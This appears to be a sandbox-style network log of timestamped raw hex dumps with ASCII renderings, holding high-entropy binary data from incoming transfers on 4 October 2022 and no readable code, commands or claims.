                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2423INData Raw: 7d 35 59 05 62 c5 ad c2 44 6e e6 81 77 c7 c7 a9 42 53 f0 09 66 79 32 50 56 53 40 07 4e 8c fb 99 7d 94 e7 cd 2b e4 af 80 a4 f2 5c 24 fd 0a 02 51 96 ca 12 63 e9 c2 35 e8 77 ff 5a 41 1c 6a c3 b1 f8 5b c0 1d 8b a0 04 71 41 90 af c9 68 37 80 23 71 52 23 b6 8f d0 b4 bc bf 18 7e aa c5 8e 68 b1 0c 11 f2 53 5e 60 31 1f 94 65 5d 40 e7 f8 ed 66 29 48 23 8e a7 49 2a 1f d6 61 3f d2 b3 87 69 82 54 f9 6f b9 3b 9b 1c 03 3e 21 7d f7 a8 d8 8e 25 1a 05 51 27 7d ff 4e 50 f0 8b d9 98 d6 05 9c c6 46 78 33 4a 71 9e 13 85 49 9a 59 65 db b8 52 15 14 d5 12 a4 c9 28 5c 6a 8d 5c 1c 21 00 f8 de 32 1d 58 e3 52 d2 8f 46 46 3e 27 1a c8 9d 2e 47 53 83 57 6f 26 9a c6 6b 01 59 6b 67 93 10 d2 f2 f5 3d 6f f0 3e b4 99 12 2f 56 8f 7b 91 c9 df d7 2b 19 bc 42 b1 0e 74 fc 77 da dc 1a 6f 60 c9 67
                                                                                                                                                                                                                                    Data Ascii: }5YbDnwBSfy2PVS@N}+\$Qc5wZAj[qAh7#qR#~hS^`1e]@f)H#I*a?iTo;>!}%Q'}NPFx3JqIYeR(\j\!2XRFF>'.GSWo&kYkg=o>/V{+Btwo`g
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2439INData Raw: 68 25 19 19 14 24 96 41 78 d8 5b 69 27 c6 c3 e1 d4 21 7c a8 82 9b 27 e7 47 d0 9d f6 94 c0 8c 4d 67 26 f7 27 39 a5 cc 9e 3c 23 8d bf 8a 69 99 84 ba 3a 07 ec 1f 80 46 40 ce 7f db 54 a5 bf 73 01 d4 05 83 d2 8b c4 9e ea 09 ec f1 1c 44 05 07 e1 ac e1 35 fe 88 a0 da b6 f1 00 1f 27 55 26 0b 45 73 75 ef 9e aa 2f 3a 7a 29 eb 76 ec db 31 04 e2 62 f7 30 87 aa bf 06 97 49 e7 c7 f4 5b b4 c1 87 fa c6 ca 7a eb b6 17 ed 65 81 3d c1 0e a2 7d a4 e5 4f 9a 52 0e 17 41 1e 42 d1 76 6c b5 a7 58 db 4e 5e 5f 7f 47 8f 07 33 8b c0 c8 60 46 d5 d4 0e eb 82 6b cc b9 eb bc 5b e2 de 3d c9 c5 78 f1 8b 11 38 7d 3f 9e 9c 19 66 ac df ac 64 2c 49 7d aa d8 f6 43 e3 c1 fa 71 22 4e 17 6c 12 9a 01 a7 f2 ec 73 c4 49 f6 97 f1 18 77 3e db 52 05 ce 5c c0 53 af aa c7 0b 33 a9 2f 27 07 15 91 24 d9 39
                                                                                                                                                                                                                                    Data Ascii: h%$Ax[i'!|'GMg&'9<#i:F@TsD5'U&Esu/:z)v1b0I[ze=}ORABvlXN^_G3`Fk[=x8}?fd,I}Cq"NlsIw>R\S3/'$9
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2455INData Raw: 84 32 6b 73 3a 4c cf 19 8d ab 00 e5 eb 4f 43 fc 78 ae e6 0e 6c 86 7b 47 97 53 32 1f ad f8 04 b1 a8 a9 22 cc 01 72 c9 34 15 f3 58 ea c3 83 b4 69 f2 16 a2 14 0e e5 33 d7 d6 9a 1e 34 e7 b4 d4 e3 41 3a 40 05 82 3f 05 57 f9 96 40 d4 53 33 1a ca fd ca ae d4 d6 6b 5f 87 55 09 ea 6f 6d b4 59 ce b3 48 20 00 77 46 10 a0 7d 6c 35 dd b9 c0 e4 2c d9 f1 00 4a f5 9f 10 ea 92 76 37 e0 ac 90 8e c2 73 51 87 b8 ab db ed d7 8a be 3a 59 1d 17 c5 b5 a2 c5 b4 c9 f9 0c ef a6 50 8f a4 4b f3 3a 99 c1 9a 60 62 56 60 7e ab ae 5c 5f d8 47 90 bc 57 89 26 91 d9 bb 9f b1 96 25 64 33 85 43 57 6b b7 34 31 d5 ba 83 b9 42 05 52 bb c7 03 f3 17 a5 78 3a 59 ea 57 bb 8e 55 41 2b e2 21 7a 2d 8a ac ec 0c dd c5 c6 42 30 c6 16 af 63 fc 9b fe 06 27 a5 b2 10 d1 a3 50 d0 cf 73 44 ac 9c 2e 30 51 9e 61
                                                                                                                                                                                                                                    Data Ascii: 2ks:LOCxl{GS2"r4Xi34A:@?W@S3k_UomYH wF}l5,Jv7sQ:YPK:`bV`~\_GW&%d3CWk41BRx:YWUA+!z-B0c'PsD.0Qa
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2471INData Raw: 89 5a 1c b1 88 84 98 1f 48 b4 49 c0 c4 8d 10 7c 03 3d 9c 28 15 d7 cd df ba b0 65 86 c7 4f ef 7f c6 fe 73 53 dd de d6 6b b2 e9 40 c2 a5 bc 3a c1 5f 45 3b 4c 0b 0f 9c 4d a5 80 5d 46 44 e7 6f 10 1b 75 f5 88 5e 9c 1e 3d 10 89 b4 7c b7 6a 73 9e 4d b3 62 f8 31 8d f1 13 5a 41 b6 23 9a ee 75 a2 5a 73 df e4 11 05 06 fb 4f 86 03 a7 92 60 99 a9 37 53 6d 22 ff 25 88 c7 d1 a5 52 0f 75 ed 09 63 b4 a7 0f 4e fb 1f 15 e0 1c e1 74 9e 8c cb c0 c6 bc e8 b3 5a 90 8e 5d 85 16 94 72 bc ec af 44 f8 33 09 67 6c d3 26 43 e1 f3 b7 e9 47 a0 ce 86 10 7f fe 73 a3 52 d5 91 f3 2b fc b3 2e 5c 9a 19 e1 07 30 7b 79 1d 8e 08 1c b2 ac fa 58 26 01 31 4d 7c 82 26 6e e0 07 18 83 3c d5 dd 78 bf 3a 28 08 6b ea b5 b8 dc 70 8e 20 0a d1 91 34 70 5e 9e 64 5f 5c 7e 50 1f 35 b4 6f 5b 4f c6 7d 43 64 89
                                                                                                                                                                                                                                    Data Ascii: ZHI|=(eOsSk@:_E;LM]FDou^=|jsMb1ZA#uZsO`7Sm"%RucNtZ]rD3gl&CGsR+.\0{yX&1M|&n<x:(kp 4p^d_\~P5o[O}Cd
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2487INData Raw: da d3 08 cd 1a 9c 0d 04 89 03 78 86 24 3f 9f a5 ff 36 f9 7a 8a 9c c5 df ec ff 6c 06 79 1b 18 ab 4c 56 e9 2e 39 00 1f b6 6a cb 58 aa eb da 93 f7 bc 5c f3 97 93 cd 1d 52 95 95 7b d2 25 8c b3 35 28 0f ca 43 52 53 6d 47 0c c3 84 48 54 a8 36 a3 c8 ad 32 c5 34 9c b1 24 9f b6 4d 89 c9 49 db 5e 54 5f 55 fb 61 17 15 f1 14 eb 45 e8 d5 da c1 b9 ff b3 e7 82 ec 5d 8c bd 6e 1f 58 47 73 1e 01 39 00 71 47 f5 ba c6 40 ad b0 ee 7b 5f be 4a 21 d9 f3 20 bc 25 83 ac 3a 3e af d7 4b d0 f4 a3 98 32 e7 13 79 7f b7 c7 f5 4f f6 6b ef 69 5c fc 48 b0 6d 6e a9 64 43 93 d0 fd ab fd 4a 14 9c fe 8b b0 dc 75 7e 58 34 d0 fe 0d 70 d9 aa 50 b6 4a 93 7d 20 c2 ef e7 73 5c 8e da 46 4e f6 68 08 d0 ca 45 84 3b 50 97 22 eb af 45 02 24 4e 91 44 e1 e6 c9 f6 a1 64 c2 67 ef 66 bb a3 02 ab 07 bc e5 5e
                                                                                                                                                                                                                                    Data Ascii: x$?6zlyLV.9jX\R{%5(CRSmGHT624$MI^T_UaE]nXGs9qG@{_J! %:>K2yOki\HmndCJu~X4pPJ} s\FNhE;P"E$NDdgf^
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2503INData Raw: 02 10 8d ac 68 00 2c 03 b1 99 98 5e 03 21 51 33 1c e3 65 1e 15 30 a9 43 99 77 77 01 dc 23 27 8c cb b0 82 03 ba a5 aa 51 f0 4c 7c 87 d4 e8 e6 0d c2 de 29 57 47 e7 6f f4 e9 7a 5f 46 de c9 6d e8 da ab a9 00 09 8a 95 d1 ca f6 84 ea c4 cd 15 92 6d e0 bf af 90 40 39 e6 a0 5c 97 a5 6a 0c 2b 24 30 29 e6 b4 3d 3a e0 1c d2 0e ec 95 0b d8 8a 43 48 ba 3b 9b 98 b7 24 15 e5 39 8b 56 78 f8 75 7d 13 05 71 7c b1 40 4d 61 d2 82 4d f4 ee 36 df 33 3c ba 16 46 ad 54 af ae e9 ba ce fc 72 69 4e 47 44 46 4e 13 bf 13 11 ad 2f e0 0a 01 1c 9c cf 62 0e 64 75 1b 9f 6c ce e2 a7 44 a4 b9 1f af 33 40 6a 54 e3 e6 71 3f 39 48 3a d7 66 27 b4 c7 67 92 bb 81 69 4e df 49 45 89 d1 9c 14 6a b9 58 bc c1 af 14 b2 86 05 76 66 96 66 f8 e0 ba d2 87 37 b9 16 4a 10 36 5d f4 f6 9e c2 e5 2f 76 31 e5 bb
                                                                                                                                                                                                                                    Data Ascii: h,^!Q3e0Cww#'QL|)WGoz_Fmm@9\j+$0)=:CH;$9Vxu}q|@MaM63<FTriNGDFN/bdulD3@jTq?9H:f'giNIEjXvff7J6]/v1
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2519INData Raw: ba aa b5 9f 1d e0 77 01 a2 0d 3b 7d 8a 1a e4 86 45 7d c3 27 06 f0 68 5e 22 fd 83 61 96 15 41 92 43 cd 13 a1 b7 f5 17 4b 2d e5 e1 1c b2 0f cd 7b f2 02 c8 18 b4 07 68 d5 ce ef 98 1d 4e 53 cd d6 33 50 2b 44 cd d9 e0 ce ab 29 bc c7 f3 82 85 76 5c f1 66 16 39 5e 43 33 f4 9c 88 7f 92 01 d7 02 91 6e c2 1b f5 d7 79 6d 8c c9 ac 51 27 9e c1 8a fa eb bc d2 01 47 99 94 b5 8b c9 05 b5 d6 df 78 be c1 fd 01 53 f1 2c ca a6 6d ca 6c d2 08 59 b5 de c5 db 84 6b c4 4b c5 13 32 91 4f 58 5b fc a9 3f f7 47 be 18 3f 1b 4e fc 52 47 e4 19 4b b3 77 c9 b2 69 66 a1 ea 3f f0 ba a1 fb 29 b5 7a be eb af c6 9a 7b 5c b0 a8 33 df 33 92 73 fb 37 a4 3d 1c 4c 8c 6d 1a 1b 19 87 04 8d 16 80 d5 12 8e 96 b1 dd a4 2c 23 cd 4a fd eb 24 4c 8f 82 5b 85 23 89 a3 f5 6c 35 b2 a1 d7 30 bc ea 22 9f 84 2f
                                                                                                                                                                                                                                    Data Ascii: w;}E}'h^"aACK-{hNS3P+D)v\f9^C3nymQ'GxS,mlYkK2OX[?G?NRGKwif?)z{\33s7=Lm,#J$L[#l50"/
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2535INData Raw: 0c 1f 6a 68 b3 96 6e 4c b6 b0 12 1a 45 8e 3f 11 25 58 da 24 40 f8 ca bc 6e 31 60 f3 1e 35 33 70 4a 0b a6 33 b6 19 f8 92 14 e2 88 b5 cf a8 db 13 ac c9 a0 89 51 55 2a fb 09 d5 8b cf 18 6e 51 29 08 fb bc da 85 29 2b 72 3a 68 96 c5 ab 81 4c f1 ac 11 57 d1 f3 0d 60 65 45 ce 3f 78 d9 d4 bd 49 f3 36 bc 25 c2 91 3a f3 b8 cb fb 23 ff 39 36 3e d0 a0 e0 d6 35 50 bc 60 08 3f 8c e3 cc f6 7f de 29 2e 55 28 e3 0e 3d 85 91 89 1c b6 c4 bf a2 c9 4a fe eb 01 b3 cc 17 7c ee b3 33 ef bf cf 52 d4 dc d4 cf d4 49 f0 12 52 b8 cf 73 84 90 1a d1 4d b3 f1 74 be d9 90 19 b6 6e d7 92 7b 4a 0e 56 65 18 21 8e 5b 9d a5 e8 4f 1a 25 5c 7b b9 ed 1f f4 ac 66 1b 05 dd e0 18 47 b2 ca 9e aa 5f f6 f7 0e 0e bd e1 ba 35 01 b7 6e d8 67 3c f2 57 51 c5 ca 8d 9b 50 ff e0 66 d3 e1 60 44 d5 5a 77 38 5b
                                                                                                                                                                                                                                    Data Ascii: jhnLE?%X$@n1`53pJ3QU*nQ))+r:hLW`eE?xI6%:#96>5P`?).U(=J|3RIRsMtn{JVe![O%\{fG_5ng<WQPf`DZw8[
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2551INData Raw: 05 86 cf 73 b9 1b 07 13 74 07 fd 2a 51 e9 da d5 42 22 b8 4b 55 c6 5c cd 40 68 a6 20 f1 1b 87 3b 0a 55 be f2 54 9f cc 84 30 0e fc 79 b3 05 bd 3e f5 c9 2a 57 0e bb a4 36 6b 51 71 72 19 1e 26 3e 01 f7 50 1b cd ce d5 a9 42 e7 dc 18 d7 67 c3 a8 76 56 f6 0b b7 95 d4 10 83 c1 b5 63 fb 78 61 7a 48 99 25 45 0f bc ff 7e e4 3f 48 c9 a2 22 7a 55 49 96 36 17 a9 b2 2a 65 77 b9 10 a3 a0 e4 1f 2c d8 00 80 d5 a8 2f 69 38 8b 90 2c 47 d6 57 18 5d 83 50 92 5d 59 e0 a0 78 d0 a5 c0 ef 9c 0f c4 04 16 25 54 c5 42 ee 54 ff a1 b5 2e 73 eb 5c 0e 10 01 bb c2 ed 1f 43 4c 25 17 8c ff fc d3 8e e0 0c fa a4 17 d0 2f 8a 6e 90 07 d5 76 39 4d 2a 0c c4 0d d7 45 d4 e8 05 3f 3f 96 09 21 1d c6 3a 87 0b 33 05 14 c3 9f d4 4b 0b f2 e7 c5 55 08 ef 7e 13 47 f2 f7 24 2b 9f 35 c7 7e f8 66 21 9a f9 3f
                                                                                                                                                                                                                                    Data Ascii: st*QB"KU\@h ;UT0y>*W6kQqr&>PBgvVcxazH%E~?H"zUI6*ew,/i8,GW]P]Yx%TBT.s\CL%/nv9M*E??!:3KU~G$+5~f!?
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2567INData Raw: 12 ee 7e f4 e2 96 fd 7f f5 bb 70 de 0f a7 60 ff fb c0 9c a1 56 a0 4f da 7f ca cb 56 aa b4 62 05 43 f3 af 32 d9 71 89 2f 2a 67 8d 27 47 67 45 6f bc 7a c2 a9 56 4e 38 9d 6a f9 6f cd 14 41 91 88 4c 53 01 db 75 a0 14 a0 15 6e ef 3c e4 91 10 5b 6b 46 f2 10 9a 4d d7 ef 85 18 d1 b8 1e 29 e7 40 6d 6f 70 2a 29 dc 86 26 c6 00 c9 a0 ab 0a 84 e9 93 47 6b 4f a2 fa 84 8f 3d 11 ce 95 db 79 bb 97 da 14 e4 47 a1 6c c4 ed a5 21 18 c9 f8 6d 9a 5f 9d 11 a3 4d 5f fe ee d5 de 06 5e b4 84 45 20 10 88 ac 85 d0 e8 4c 49 1c 15 85 d2 49 ae cc a0 36 f3 d8 13 b4 59 1e d2 c1 02 25 85 a0 d5 7c b3 03 a3 30 20 c2 4f 50 e5 75 0f 8b 7f 1f 2a 78 8d 4d 93 c2 0f 10 1f f2 e5 69 3b f3 c1 04 bf 90 6c 04 c0 e4 e6 f6 96 9d 03 d2 25 93 bf f1 ac f6 4a cf 76 dc d6 e8 c3 b1 4f 57 c7 15 fd 24 53 3c b6
                                                                                                                                                                                                                                    Data Ascii: ~p`VOVbC2q/*g'GgEozVN8joALSun<[kFM)@mop*)&GkO=yGl!m_M_^E LII6Y%|0 OPu*xMi;l%JvOW$S<
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2583INData Raw: 2a 1e 65 09 9a 97 64 79 af 96 ba ca 4b c6 91 16 ac 4e 78 5b 6d 05 d4 e5 f1 73 f2 80 00 ef 2b 46 79 ea 3d 79 9d 65 e8 a4 19 26 00 d4 04 40 dd ed 33 49 a6 96 09 bc e1 92 c3 6a 06 9f 61 b5 92 56 be 0a 8c f3 41 89 59 95 cc 24 b4 e1 ee b7 7e fc d9 b2 da 0e ba 88 4b 63 68 b6 ba 87 c6 0c 86 64 a8 51 c7 b3 be 22 ac 14 6d 07 b4 35 79 e1 aa d0 1e 0b c4 3d 00 65 f7 9c 1f 44 4e f8 0b 16 2d cb 9f 77 16 27 6a e4 9b 95 27 81 23 57 75 0d 39 9d 53 6d 41 58 a6 e0 64 5d 2a 59 93 71 de 93 0b 9c 02 15 8f 68 ab a3 4e 80 a0 46 e9 a3 2f 2c ce 92 db 7b 92 cf c7 4b 26 35 64 34 3e ec 8d cc 00 41 c6 d6 16 af 83 74 e2 28 af 1a b7 68 17 a8 50 1e 60 38 32 96 fc aa 85 0e 6a 1e da 03 04 b0 00 41 7a ff 32 12 a0 0b 02 f8 1b a6 0e 5a 12 0a 1b 06 f1 ed da e2 36 76 59 52 f8 ff e6 4d 31 d4 3e
                                                                                                                                                                                                                                    Data Ascii: *edyKNx[ms+Fy=ye&@3IjaVAY$~KchdQ"m5y=eDN-w'j'#Wu9SmAXd]*YqhNF/,{K&5d4>At(hP`82jAz2Z6vYRM1>
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2599INData Raw: 87 dc 2d 02 b6 99 94 83 98 89 72 90 84 57 60 36 94 ed ae 28 cb c8 da e8 d9 99 7c a2 c1 8f ae 93 0b 00 a2 86 6b b9 7b 0a 3c 50 8d 00 06 f2 47 61 4b 65 50 79 5f 79 32 dc 1f 90 c4 0f 29 69 76 de a1 e9 2a e3 7c 6d 11 7b 55 f5 2c c7 e0 19 52 be f6 2d 05 a0 9a 17 72 c5 f7 3f a6 7f 62 34 ad 54 74 48 04 4d 7f 1b bc 0b 39 fe 94 da 59 be 6e 4a cd a1 19 5e e1 f8 ae b0 f1 38 33 1a a2 c4 55 b9 8d e9 dd 32 2c 9e 9e 9a c3 bb c5 81 34 12 3d b2 81 5d a6 b7 b1 18 a3 61 47 f9 5b 5c 56 ac d6 e1 4f fa 41 f5 83 44 09 22 26 5d 85 0a 02 2b ae 6b dd 37 ec b9 a1 1d 8c 1d bf eb aa 38 c6 9c 38 c9 7d 46 49 08 87 b4 2f 74 82 18 f7 e9 a8 19 4c 7d d2 b5 1b 2b 7c f2 31 04 78 8a c5 b0 2a 90 37 ca 30 6d a0 79 4f 87 e7 f7 ad 65 a9 d8 df 23 f1 23 06 89 bf 88 9b 8a 24 99 96 36 17 25 7c 38 63
                                                                                                                                                                                                                                    Data Ascii: -rW`6(|k{<PGaKePy_y2)iv*|m{U,R-r?b4TtHM9YnJ^83U2,4=]aG[\VOAD"&]+k788}FI/tL}+|1x*70myOe##$6%|8c
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2615INData Raw: 11 90 cf 23 ed bf 33 db 29 e8 6d d3 6f 64 35 f1 c7 fc c4 11 48 f3 29 38 ff e2 b7 bc 50 9c 3b 6c 52 e0 2d f1 d2 12 c8 35 24 d1 62 28 d5 c4 e3 c5 e2 07 47 74 b9 88 4c 31 61 aa 8e 8a cd c2 b4 8c 73 1c 68 14 07 64 b0 30 bd 11 f2 92 42 4c d9 ce b0 f8 c9 4f bb c5 e0 b6 29 a4 de f1 1f b9 4c 23 95 ba 72 3a e1 db 0a 5d b7 94 21 c8 24 8f 93 fb b9 4a 4e 44 43 15 c8 41 08 e6 e0 46 36 3d b6 80 87 57 1e d5 f2 53 79 59 4d fa 15 51 7a 1b e2 f6 e4 04 b8 08 c0 00 be c8 2a fa a4 13 d2 35 e5 d9 4f a2 da f1 e5 d4 c0 ce 33 67 c6 bf 2e fe ff 99 9b f5 9d dc 7d 48 66 89 da 56 ab ef 0a 8a 7c 89 0c 59 41 f1 d0 04 93 07 d6 5c d3 28 86 5e 8c 5e 72 87 a2 00 f0 bb 99 6c d8 a9 63 cd 75 fc dd 4b db d2 94 5b 99 a9 56 cd 02 ab 8d 2b 5a 34 b0 16 d9 83 ff 81 a9 a2 94 9c 72 5a 12 51 74 61 40
                                                                                                                                                                                                                                    Data Ascii: #3)mod5H)8P;lR-5$b(GtL1ashd0BLO)L#r:]!$JNDCAF6=WSyYMQz*5O3g.}HfV|YA\(^^rlcuK[V+Z4rZQta@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2631INData Raw: 38 15 8f 13 05 d2 50 13 c7 77 de c2 59 02 65 bc 66 fb c9 60 21 3d 7f 94 63 28 61 7e 3f 4d a6 7e f9 e8 ed 15 fe b0 c8 d2 02 cb dd 3c 84 ce 48 43 51 dd cf 0a 9d 6a bc 52 b6 c7 73 74 ec d4 4c e3 f1 cc e3 44 6b 06 fb c1 ed d8 1a bd ad 59 b1 35 61 16 80 36 bd 50 30 dc dd 58 b9 01 52 0b 00 65 49 44 64 fa 4d 1f 38 46 b2 25 32 ad 57 a2 06 f8 90 26 32 18 d1 6c 5f 48 6e b3 0e 08 e1 a9 bc b8 6f e5 f1 e1 4d 46 60 c4 ef e1 4c 12 2e 54 96 d7 9e 11 39 86 02 45 9f a2 63 b4 f2 f2 8a be 90 44 cd 1f f1 0a 7f 5f 9f 3b f4 16 1b 40 68 66 d3 c1 41 82 d4 87 76 44 06 10 68 d7 5d 8b e5 93 0f ca ee e5 bc a3 9e e1 4c e6 34 39 2b 3f 69 8f 50 ce af f8 72 f7 1c 06 d5 18 8d 93 2c ec e5 3a b0 71 79 24 a3 0f 68 22 e9 9c c4 73 1c 75 ca 27 2c a4 32 5a e2 c1 e4 14 c9 b6 60 8a 01 40 16 19 36
                                                                                                                                                                                                                                    Data Ascii: 8PwYef`!=c(a~?M~<HCQjRstLDkY5a6P0XReIDdM8F%2W&2l_HnoMF`L.T9EcD_;@hfAvDh]L49+?iPr,:qy$h"su',2Z`@6
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2647INData Raw: 48 23 35 4e 0c 98 cd ab 38 5a a6 5f df f3 aa 38 7c d2 ef 34 50 68 a6 f4 1f 45 79 69 c1 86 7b 2b 1c ab d8 9b 6d 4d de 0e 85 c2 bc 6c 5b 6d 12 93 c7 c2 d9 ee c7 b8 be b2 95 91 56 a3 e6 bc 47 1d b0 38 38 aa f9 75 fb 78 e2 2c a4 aa 90 03 9d a3 64 73 b8 db 58 07 cd 85 66 e7 b6 a9 fd 07 ba f5 19 55 01 49 59 93 84 79 b2 9d 9b c7 d3 44 64 d4 e7 4b a8 b9 d7 81 17 b2 d5 aa 63 47 2a 62 ec ae dc 17 06 9a 8e 17 35 00 c6 75 bf 5f d5 5c a1 d0 ee 1b b6 dd 3c c8 db 5e d6 f7 3c 16 b2 9a 30 29 ad 77 12 af e3 b8 17 86 ca c5 a1 12 bd 43 22 d8 83 a8 e7 c6 4e 2c 16 e6 7c e7 5d 16 ac f0 a3 d5 2f 68 ba 8d 3c 8f d9 2e 67 02 fc 4b f3 5d 15 ed 60 8d 89 41 70 5f 3f 41 a8 27 ac 6c f2 d2 97 05 3a 9b 0e ca 68 69 7e 72 c5 96 05 aa a4 3c 48 38 a0 12 cd 85 a6 ca 43 d9 73 d1 65 ba d4 96 71
                                                                                                                                                                                                                                    Data Ascii: H#5N8Z_8|4PhEyi{+mMl[mVG88ux,dsXfUIYyDdKcG*b5u_\<^<0)wC"N,|]/h<.gK]`Ap_?A'l:hi~r<H8Cseq
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2663INData Raw: b8 99 30 15 d4 68 8f fd bf c3 2b ab 9f d6 51 47 25 a1 c6 fc 49 76 69 82 11 16 9d 19 b6 74 cd 69 c1 09 7a 61 8c ec 91 84 95 11 6b a1 67 3a 1e 54 6d 26 63 75 f4 cb 4a 30 2f 22 fc 31 29 1d f1 c2 e7 96 90 72 7b f7 22 ca 5d 8b 88 f7 e4 95 d1 35 e7 a0 14 fd 15 f4 ea 67 b0 10 11 8a 45 60 47 eb b9 fb 54 d1 c2 f8 6a 43 1c df 6e d4 e4 0f d6 3d e5 42 ae 6b 2d 22 9b 62 4f 57 17 9b a5 de 12 c4 03 6f ab f0 f2 d8 55 4b 97 98 59 de d0 e8 eb ed d8 97 2b 45 e5 5e 4b 68 9a 3a 56 04 5b 8f 82 05 a1 e0 1c 38 1b 48 bb 0e ff be 00 b5 09 e2 83 c5 35 8d 1a 93 54 33 e8 96 94 01 0d 7e aa c8 d9 0c 4e 59 85 5a fb 9a b2 4c f4 09 9c ed c3 bc a3 63 b2 17 dd 11 40 ff a7 e9 7d dd 91 a6 03 28 a4 f7 46 00 d1 cd 81 69 be e8 52 c6 20 01 34 91 e9 81 55 4e af cd da 26 00 e3 55 f7 e1 22 42 ce d0
                                                                                                                                                                                                                                    Data Ascii: 0h+QG%Ivitizakg:Tm&cuJ0/"1)r{"]5gE`GTjCn=Bk-"bOWoUKY+E^Kh:V[8H5T3~NYZLc@}(FiR 4UN&U"B
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2679INData Raw: da 28 14 65 e2 0a f6 cc 09 94 1b 5e 97 8f 0e 1f 33 a6 80 14 06 cd 00 09 be b2 12 90 7e d4 ed 33 93 08 f9 fe c5 7c 04 d0 da 7e 03 69 81 17 b2 3a f0 d1 14 ce a6 74 a2 f3 82 8c 08 e1 30 69 aa c5 0b 9b e7 f4 d5 99 f0 46 7e 16 92 47 09 51 82 86 e4 3e 79 36 12 c8 ca 5e 6f c8 5e 6b ac 4c fb c7 60 d3 06 64 73 75 2f 23 cd 39 38 27 8e 63 b7 52 24 1d ce cb 0a ca 09 74 17 d3 1b 69 fc aa 9f 22 9b 7d a3 6d 61 53 1b 9d 86 be d0 cc 05 6a f6 ba fc 86 a4 f2 88 27 39 ae 70 ed bb e5 c9 73 5e bb e8 b0 eb 14 69 6b b2 ce b4 f0 3b da 47 ab a0 aa bc 44 76 5e e9 fd e0 d9 cc 19 08 df 98 0f 05 9c d2 ca 61 03 de e1 bc eb d3 a3 97 8f a5 11 07 87 9b 72 e7 64 ab 57 8f 8e b2 9f 2a b7 3f 57 cf 8f 2e 66 e6 bb b0 74 28 5d df 68 1b f6 1f b0 b6 7f b0 d9 c9 dc 31 2c c0 fe a7 07 3e 71 94 61 99
                                                                                                                                                                                                                                    Data Ascii: (e^3~3|~i:t0iF~GQ>y6^o^kL`dsu/#98'cR$ti"}maSj'9ps^ik;GDv^ardW*?W.ft(]h1,>qa
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2695INData Raw: 78 24 02 33 12 63 65 8d c7 b3 71 c1 e6 7a 59 2f cb 59 88 06 94 78 1f 03 a2 fc 45 e9 bd 49 d5 51 fe 40 65 48 1e f7 93 0b ef cc 24 e1 86 32 69 07 af 13 cd 49 ee 36 f6 ea 94 9a 65 70 5f 2f 91 11 6b 7b 9d 11 3c 23 82 ad 38 26 89 40 45 64 e9 41 d7 bf 86 8a e1 82 b7 78 b0 c3 bb 56 41 25 ef 0d 8f 44 0d ab 53 9b 05 fe ed 71 7f 70 60 06 e0 d5 5d e1 7e 2d 0d d0 be d8 1c 08 87 ca 99 26 e9 76 df 7d c4 7f c9 35 3a 51 78 c6 20 4f 50 ad 2c c3 03 d3 43 ab dd c4 55 73 d5 5c 0f 8c c4 6e dd 1d c6 48 43 3e d3 44 b0 2f bd 12 06 2a 23 19 86 a4 dd 43 3d db 47 d6 22 ee 8f a4 5b d2 54 3d 05 b3 5e fc a1 f0 58 ad fa bf 3c 0b 38 89 b4 c9 72 8a 67 a1 5a 96 4f 9b f5 89 8a 25 95 67 de 98 25 2d d0 0f 6f 4d 22 9e fd 35 b0 86 55 71 59 2a 3a 5c f0 8c a1 95 12 cf 8b 9d ac 88 af ef 4e 8d 37
                                                                                                                                                                                                                                    Data Ascii: x$3ceqzY/YxEIQ@eH$2iI6ep_/k{<#8&@EdAxVA%DSqp`]~-&v}5:Qx OP,CUs\nHC>D/*#C=G"[T=^X<8rgZO%g%-oM"5UqY*:\N7
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2711INData Raw: 1e 9e 34 e8 b5 08 f8 3b 18 42 a3 b5 1d fd ac 35 d2 3e 58 71 b5 f6 67 00 b1 b2 1f 94 55 09 7b e8 da 0c f3 d4 40 0a 00 0b 19 f7 1c fa 18 5e ac 5a 0f b8 fb eb 10 3c 11 a5 f6 36 20 90 cd 37 4f e7 1e 84 d3 59 40 ae 55 94 26 34 e5 68 21 47 4f 54 d6 83 e8 5a c9 2e dc de b9 6d f8 1a 5e fc f5 90 b7 ba 1a e0 c1 17 1d 79 a7 0e b8 9d 51 bd f2 1a 14 f7 71 2b 8b c3 9c e7 a2 8e 4d 2e a1 5c 3f d0 54 88 77 38 10 d5 61 aa cd e9 9a d8 7d 3c 5b ec e2 5a 08 29 dd 94 17 75 a0 73 31 bd ac f3 65 35 88 02 62 a8 00 b0 8a 8e a7 f6 97 f6 36 08 a0 d1 eb ba c6 e0 9d e7 ba 32 cc f4 78 5a 8a 5a d5 7e 40 e9 d6 62 27 92 46 38 70 f6 9f 28 07 74 3e c8 13 cf 14 4e 6a 90 12 35 4f cc f9 ac 3e 82 99 63 e1 23 f6 35 7e ed 6c 33 d2 71 d7 38 ca 9c f1 f1 19 fe 71 83 20 06 8a 4b 50 2c 1a f5 51 3e db
                                                                                                                                                                                                                                    Data Ascii: 4;B5>XqgU{@^Z<6 7OY@U&4h!GOTZ.m^yQq+M.\?Tw8a}<[Z)us1e5b62xZZ~@b'F8p(t>Nj5O>c#5~l3q8q KP,Q>
